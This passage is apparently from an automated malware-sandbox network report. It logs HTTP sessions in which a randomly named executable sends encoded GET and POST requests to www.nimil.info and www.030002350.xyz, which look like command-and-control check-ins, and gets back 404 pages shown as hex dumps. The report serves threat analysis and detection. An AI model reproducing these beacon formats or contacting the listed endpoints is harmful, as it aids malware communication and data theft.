                                                                                        Nov 14, 2024 08:17:21.645467043 CET1236INData Raw: 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33
                                                                                        Data Ascii: -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798
                                                                                        Nov 14, 2024 08:17:21.645479918 CET1236INData Raw: 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e
                                                                                        Data Ascii: 7 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -
                                                                                        Nov 14, 2024 08:17:21.645523071 CET1236INData Raw: 34 34 20 32 2e 34 37 34 37 37 2c 39 2e 36 36 33 31 20 31 2e 39 34 34 34 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e
                                                                                        Data Ascii: 44 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;str
                                                                                        Nov 14, 2024 08:17:21.645534992 CET848INData Raw: 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: idth:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.
                                                                                        Nov 14, 2024 08:17:21.645668983 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                                        Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                                        Nov 14, 2024 08:17:21.645701885 CET1236INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                                        Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                                                        Nov 14, 2024 08:17:21.650427103 CET1236INData Raw: 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                        Data Ascii: e:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.563498203.161.46.205803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:23.520235062 CET509OUTGET /gdpp/?X8wps=HD9ptle8L&qb6h=XNlLlzJ611biWBDnQnCeFZ6NVZ4xLjWXfr+0L15v/dkoQ7LxqA4db7MsNS0iTnnZ4s3kssINbHg5oGi7TlfLVlZQ57t8NMxb4MyHODvld5yYZYMDALlCTAgJ47pyJF8rKg== HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.nimil.info
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Nov 14, 2024 08:17:24.176939964 CET1236INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:24 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 16052
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                        Nov 14, 2024 08:17:24.176964998 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                        Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                        Nov 14, 2024 08:17:24.176979065 CET424INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                        Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                        Nov 14, 2024 08:17:24.176990986 CET1236INData Raw: 2d 30 2e 32 33 36 32 31 20 2d 33 2e 35 30 35 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d
                                                                                        Data Ascii: -0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.7
                                                                                        Nov 14, 2024 08:17:24.177002907 CET1236INData Raw: 37 38 31 33 37 39 2c 32 30 2e 30 31 30 34 38 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32
                                                                                        Data Ascii: 781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642
                                                                                        Nov 14, 2024 08:17:24.177807093 CET424INData Raw: 20 31 33 2e 37 39 31 37 2c 31 32 2e 39 31 36 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33
                                                                                        Data Ascii: 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.1
                                                                                        Nov 14, 2024 08:17:24.177818060 CET1236INData Raw: 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a
                                                                                        Data Ascii: x;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,1
                                                                                        Nov 14, 2024 08:17:24.177828074 CET1236INData Raw: 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32
                                                                                        Data Ascii: 26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11
                                                                                        Nov 14, 2024 08:17:24.177839041 CET424INData Raw: 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                        Nov 14, 2024 08:17:24.177850962 CET1236INData Raw: 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35
                                                                                        Data Ascii: .95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linec
                                                                                        Nov 14, 2024 08:17:24.182192087 CET1236INData Raw: 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35
                                                                                        Data Ascii: h id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.563499161.97.142.144803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:29.398915052 CET770OUTPOST /wrcq/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.030002350.xyz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.030002350.xyz
                                                                                        Referer: http://www.030002350.xyz/wrcq/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 35 59 70 71 50 39 75 30 46 46 45 4f 63 55 6f 54 4b 78 68 77 52 41 37 5a 61 65 46 76 71 37 68 5a 6b 36 50 59 35 6b 6c 54 61 61 72 4d 39 70 68 55 62 30 70 4d 4f 65 70 50 38 55 75 49 4c 37 4f 49 6f 46 43 54 46 45 4f 4f 72 4d 55 74 61 41 6c 68 57 76 73 4b 6b 30 74 55 66 4b 41 62 73 54 59 69 2b 63 7a 67 39 32 42 55 52 67 30 53 65 67 68 42 65 77 54 78 71 69 6e 56 57 53 63 4e 68 52 36 70 66 55 6b 32 74 31 76 45 6b 35 65 2f 4a 6d 35 66 63 34 53 79 51 6a 67 69 4b 64 49 71 61 73 4e 65 36 77 74 39 57 35 54 35 4d 4c 41 61 68 4d 66 34 45 6a 2f 4c 55 49 53 2b 58 4f 59 45 55 76 44 31 4c 74 43 5a 67 75 59 3d
                                                                                        Data Ascii: qb6h=5YpqP9u0FFEOcUoTKxhwRA7ZaeFvq7hZk6PY5klTaarM9phUb0pMOepP8UuIL7OIoFCTFEOOrMUtaAlhWvsKk0tUfKAbsTYi+czg92BURg0SeghBewTxqinVWScNhR6pfUk2t1vEk5e/Jm5fc4SyQjgiKdIqasNe6wt9W5T5MLAahMf4Ej/LUIS+XOYEUvD1LtCZguY=
                                                                                        Nov 14, 2024 08:17:30.228550911 CET1236INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:17:30 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: W/"66cce1df-b96"
                                                                                        Content-Encoding: gzip
                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                        Nov 14, 2024 08:17:30.228595018 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.563500161.97.142.144803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:31.956199884 CET790OUTPOST /wrcq/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.030002350.xyz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.030002350.xyz
                                                                                        Referer: http://www.030002350.xyz/wrcq/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 35 59 70 71 50 39 75 30 46 46 45 4f 64 30 34 54 4a 53 35 77 45 77 37 59 55 2b 46 76 67 62 68 64 6b 36 54 59 35 6d 49 49 64 70 50 4d 39 49 52 55 59 33 78 4d 4e 65 70 50 6b 6b 75 4a 54 62 4f 44 6f 46 4f 62 46 47 61 4f 72 4d 77 74 61 41 31 68 57 63 45 46 6c 6b 74 57 57 71 41 5a 69 7a 59 69 2b 63 7a 67 39 32 46 75 52 67 63 53 65 52 78 42 63 52 54 79 6e 43 6e 55 65 79 63 4e 7a 68 36 74 66 55 6c 52 74 77 50 2b 6b 2f 43 2f 4a 6b 78 66 64 70 53 78 5a 6a 68 70 58 4e 4a 64 57 5a 6f 37 69 6d 78 76 63 49 61 63 51 34 38 67 67 36 75 53 65 42 33 6a 48 6f 2b 47 48 64 51 7a 46 66 69 63 52 4f 53 70 2b 35 4f 2b 62 43 62 65 6d 6c 30 38 39 6b 71 62 50 54 76 4d 49 74 62 79
                                                                                        Data Ascii: qb6h=5YpqP9u0FFEOd04TJS5wEw7YU+Fvgbhdk6TY5mIIdpPM9IRUY3xMNepPkkuJTbODoFObFGaOrMwtaA1hWcEFlktWWqAZizYi+czg92FuRgcSeRxBcRTynCnUeycNzh6tfUlRtwP+k/C/JkxfdpSxZjhpXNJdWZo7imxvcIacQ48gg6uSeB3jHo+GHdQzFficROSp+5O+bCbeml089kqbPTvMItby
                                                                                        Nov 14, 2024 08:17:32.779705048 CET1236INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:17:32 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: W/"66cce1df-b96"
                                                                                        Content-Encoding: gzip
                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                        Nov 14, 2024 08:17:32.779956102 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.563501161.97.142.144803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:17:34.510745049 CET1807OUTPOST /wrcq/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.030002350.xyz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.030002350.xyz
                                                                                        Referer: http://www.030002350.xyz/wrcq/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
